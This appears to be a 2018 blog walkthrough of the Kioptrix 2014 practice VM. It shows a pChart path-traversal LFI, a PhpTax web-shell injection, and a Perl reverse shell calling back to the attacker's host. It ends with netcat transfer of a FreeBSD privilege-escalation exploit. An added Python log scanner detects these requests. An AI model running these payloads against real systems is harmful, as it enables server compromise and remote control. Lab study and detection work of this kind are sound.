Saturday, 29 September 2018

Remote Code Execution kioptrix 2014

Remote Code Execution


Get the VM's IP:

arp-scan --localnet

Enumeration:

nmap -A 192.168.85.145

LFI (pChart 2.1.3, path traversal through the Script parameter):

http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd
http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf
https://www.exploit-db.com/exploits/31173/


CURL (port 8080, sending the User-Agent string taken from the httpd.conf retrieved above):

curl -H "User-Agent:Mozilla/4.0" http://192.168.85.145:8080


RCE:

PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution
https://www.exploit-db.com/exploits/25849/
http://192.168.85.145:8080/phptax/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]);?>

http://192.168.85.145:8080/phptax/data/rce.php?cmd=id

uid=80(www) gid=80(www) groups=80(www)

http://192.168.85.145:8080/phptax/data/rce.php?cmd=perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.85.144:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
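From the defender's side, the three request shapes above (the pChart traversal, the PhpTax newvalue write, and the call to the dropped file under data/) are all visible in the web server's access log. The following is an added example, not part of the original post or of either project; it assumes Apache combined-log format and runs over constructed log lines modelled on the requests in this write-up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines modelled on the write-up's requests (not real logs).
SAMPLE_LOG = """\
192.168.85.144 - - [29/Sep/2018:10:01:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.168.85.144 - - [29/Sep/2018:10:05:11 +0000] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.168.85.144 - - [29/Sep/2018:10:05:30 +0000] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 44 "-" "Mozilla/4.0"
192.168.85.130 - - [29/Sep/2018:10:06:00 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBars.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(target: str) -> list[str]:
    """Return the names of the suspicious patterns present in one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    # parse_qs percent-decodes values, so %3C%3Fphp becomes <?php here.
    params = parse_qs(parts.query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]
    hits = []
    # Traversal sequence in any parameter (the pChart LFI used Script=/../../etc/passwd).
    if any('../' in v or '..\\' in v for v in values):
        hits.append('path-traversal')
    # A PHP open tag being written through a parameter (the PhpTax newvalue write).
    if any('<?php' in v.lower() or '<?=' in v for v in values):
        hits.append('php-tag-in-param')
    # A .php file executed out of the application's data directory with a cmd parameter.
    if path.startswith('/phptax/data/') and path.endswith('.php') and 'cmd' in params:
        hits.append('webshell-call')
    return hits

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, request target, hit names) for every log line that matches a pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group('target'))
        if hits:
            findings.append((m.group('ip'), m.group('target'), hits))
    return findings

if __name__ == '__main__':
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {','.join(hits)} {target}")
```

The last sample line (a legitimate pChart example script) produces no finding, so the rules key on the traversal, the injected tag and the data-directory execution rather than on the application paths alone.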



Privilege Escalation:

searchsploit freebsd 9.0
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
https://www.exploit-db.com/exploits/26368/

On the attacking machine (192.168.85.144), serve the exploit source:

nc -lvp 1111 < 26368.c

On the target, fetch it and compile:

nc -n 192.168.85.144 1111 > 26368.c
gcc 26368.c -o prives
